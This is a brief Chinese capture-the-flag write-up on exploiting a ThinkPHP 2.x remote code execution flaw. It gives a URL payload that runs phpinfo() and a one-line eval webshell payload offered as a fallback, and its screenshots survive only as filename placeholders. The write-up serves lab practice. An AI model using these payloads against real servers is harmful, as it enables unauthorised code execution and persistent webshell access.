[ThinkPHP]2-Rce 1

TazmiDev發表於2024-11-09

[ThinkPHP]2-Rce 1

啟動例項發現是一個ThinkPHP的示例程式碼,根據題目判斷這題為RCE

image-20241105081322688

掃描器掃描,未發現存在的REC漏洞(根據題目以及掃描結果猜想,可能是2.x版本的rec)

image-20241105081525696

構造payload,成功顯示phpinfo頁面

?s=/index/index/name/${phpinfo()}

image-20241105082201274

唱跳rap籃球+F,直接找到flag

image-20241105082253527

tips.有時候在phpinfo找不到,可以採用一句話木馬形式

?s=/index/index/name/${@eval($_POST[123456])}

image-20241105082540574

相關文章